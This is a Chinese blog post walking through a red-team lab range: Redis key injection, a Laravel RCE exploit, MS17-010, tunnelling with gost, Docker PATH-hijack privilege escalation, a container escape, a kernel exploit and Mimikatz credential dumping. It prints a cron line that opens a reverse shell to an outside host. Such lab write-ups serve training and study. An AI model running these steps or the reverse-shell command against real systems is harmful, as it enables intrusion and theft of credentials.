freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

ATT&CK实战系列-红队评估(七)
猫和老鼠 2023-03-03 09:58:52 152176
所属地 广东省

分享本人打靶机的思路,如有错误纯属我对知识点理解错误,还望指正

网络拓扑图

此处桥接公网DMZ区服务器ip不太一样

dmz区公网ip不是  192.168.1.8  是    192.168.10.246

1652777268_628361349169e0eb1d5c2.png!small








0x00 外网打点

1.模拟公网ip地址:192.168.10.246

1652777277_6283613d93ad027017f25.png!small












发现打开22,80,81,6379等危险端口

尝试对22、6379端口,弱口令爆破


22端口暴力破解,无法成功

6379redis未授权,直接闭着眼睛写公钥

1652777304_628361581069b2c1e4714.png!small

1652777323_6283616bcb987f80a03d3.jpg!small

1652777337_6283617915a7f0d024081.png!small




























直接root权限

我们转而使用xshell连接,连接成功,使用xshell主要是为了更加方便的进行文件传输,上传代理工具,部门大佬推荐gost,相当稳定且速度飞快

1652777364_62836194b5902c6ae56c5.png!small












代理成功

1652777380_628361a4346b13e0a22c5.png!small













此处为一个突破口

只剩下80和81端口,访问80端口为404,只剩下81端口,访问发现为laravel

百度搜索该框架存在CVE-2021-3129漏洞,拿着exp直接拿下

1652777393_628361b1470a326bb84fe.png!small








拿下哥斯拉shell

1652777399_628361b73ff946dec8983.png!small










将shell派生到msf中

1652777409_628361c1c5c87044eb6ec.png!small











此处进行操作,发现成功进入内网

1652777426_628361d2bc7f353f2ac3a.png!small










0x01内网横向

横向扫描发现52网段,52段存在192.168.52.30主机开放8080端口

1652777436_628361dc1b771f77542de.png!small










发现通达OA,版本比较旧了,存在多个漏洞,可直接使用exp拿shell

1652777448_628361e81cfdd247da327.png!small

1652777464_628361f8ae89c91abf5a4.png!small1652777475_62836203531304ae61688.png!small1652777487_6283620f6976fba8c333d.png!small1652777521_628362319c7c6caf37763.png!small













































添加一个用户

1652777531_6283623b0a510a2c718a2.png!small















因为我们之前探测过并没有打开3389端口,所以我们得手动打开3389端口1652777545_6283624940614fc07916b.png!small





已经打开

1652776475_62835e1bb49be054fef28.png!small



这个时候已经打开了

1652777551_6283624f598d70f1117eb.png!small

1652777572_62836264957caefeedc58.png!small

















上面我们还发现开发了445端口,那必须得永恒之蓝来一手,同样存在1652777592_62836278cc219457febad.png!small

这里可以直接使用msf拿下或者使用

连接上3389后,发现新的段,93段

1652777607_62836287638f1381767de.png!small











先做一下内网穿透,同样使用gost

1652777622_62836296ae363e2fee9e7.png!small











gost非常方便,回头入口机,把入口机3392端口的流量穿透到30这台机器3393端口,这样我们就可以对93这个段进行测试了

1652776528_62835e50e67fd046d2f48.png!small

1652777641_628362a9e896c1c80dc4f.png!small











此时入口机,192.168.10.246的3392端口为第三层内网【93段】

直接010打一波发现两台

1652777650_628362b21746f9f75ad89.png!small










到这里,其实目标靶机权限都可以拿到了,明天再测测域和其他漏洞,感觉这套靶机不止这些东西,今天先到这

------------------------------------------------------------------------------------------------------------

0x02 docker提权

又是早起上班的一天,昨天这套靶机还有一些点没打完,继续深入看看

继续访问这个地址http://192.168.10.246:81/

1652777664_628362c0e83228f069525.png!small











我们连上哥斯拉后发现了一个比较有意思的地方

1652777671_628362c7d660faed11129.png!small








我通过redis拿下的ssh找不到这个路径,一开始觉得很奇怪,后来发现这应该是个docker1652777681_628362d19af6056d208f6.png!small









权限很低,不管这些,权限低,那肯定得提权

1652777692_628362dc1cf86bce91f84.png!small







发现用户jobs下面有个可执行文件,我们去看看

1652777699_628362e3e7d7cd0711a2b.png!small

1652777711_628362ef123003113dfdb.png!small
















发现执行了ps这个命令,这就好办了,我们创建一个虚假的ps,然后改一下PATH,就可以得到root权限了【忘记写一个步骤,需要提前看tmp/ps里面是否执行过ps命令】

echo '/bin/bash' > /tmp/ps

chmod 777 /tmp/ps

export PATH=/tmp:$PATH

echo $PATH

修改好之后,我们重新运行一下shell文件

1652777722_628362fa534910c74e8a3.png!small







成功获取到了root权限,我们现在可以考虑一下docker逃逸了

0x03 Docker特权模式逃逸

我们使用fdisk -l查看一下磁盘文件

1652777735_6283630794ff6144d760b.png!small








发现有/dev/sda1,我们创建一个文件夹,然后把这个文件挂载到我们创建的文件夹下

1652777741_6283630d67705c603c010.png!small






挂载成功,我们看一下有没有用户

1652777747_628363138704e42d947ca.png!small







这个地方可以直接写定时任务让ubuntu本机进行反弹shell

echo '* * * * * bash -i >& /dev/tcp/192.168.11.243/1390 0>&1' >> /abc/var/spool/cron/crontabs/root


发现存在一下名为ubuntu的用户,这样就好办了,我们创建一个公钥把它添加到靶机的私钥里,就可以直接使用ssh登录了

冰蝎无法使用ssh-keygen

1652777761_62836321a7921bd16e6aa.png!small1652777774_6283632e9c6641090bc92.png!small

1652777843_6283637398dd7aee0fa52.png!small

1652777782_628363362fc69a4a44e39.png!small

1652777942_628363d6e222492a4874c.png!small












































成功登录,但是我们并不是root权限,我们查看一下靶机的内核,看看有没有漏

1652777984_6283640085a3064ade716.png!small











发现有个叫cve-2021-3493的漏洞,刚好包含了这个版本

0x04 Linux kernel特权提升漏洞(CVE-2021-3493

我们先把exp复制进靶机

Github地址:https://github.com/briskets/CVE-2021-3493

编译下,然后运行
1652777998_6283640ecc48f2d56bf44.png!small1652778011_6283641b8b27eb274c3fc.png!small1652778021_62836425855a4408513df.png!small






















成功获取到root权限,我们也把它的shell反弹到msf

1652778038_62836436bec97684ee809.png!small




接下来,我们使用DMZ区域的ubuntu添加一个通往52网段的路由

0x05 拿下域控

我们查看一下他的域信息

1652778059_6283644b6e71060e8ab07.png!small








发现有一个whoamianony域

我们使用kiwi模块尝试抓一下密码

1652776894_62835fbe35eaa67c3d0ad.png!small










报错了,说要64位进程才可以运行,我们随便找一个64位进程迁移一下即可

1652776911_62835fcf4bf77a868560f.png!small

1652778076_6283645ce300ed11d9a5f.png!small

















抓到了域控的账号密码

后面的就没操作了,有两种思路
1.通过ms17-010拿下剩下的两台93段的主机权限

2.通过PsExec Pth进行攻击拿下93段两台主机权限

3.直接使用域控用户登录93段的两台主机

# 渗透测试 # web安全 # 内网渗透 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 猫和老鼠 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
猫和老鼠 LV.3
君子慎独,不欺暗室,卑以自牧,含章可贞。 大丈夫立于天地之间,当养天地浩然正气,行光明磊落之事,克己,慎独,守心,明性。 以克人之心克己,以容人之心容人。
  • 5 文章数
  • 9 关注者
JAVA代码审计篇-SQL注入
2023-03-03
App防抓包的四种绕过方法(详细)
2023-03-03
ProcDump+Mimikatz绕过杀毒软件抓密码
2023-03-03
文章目录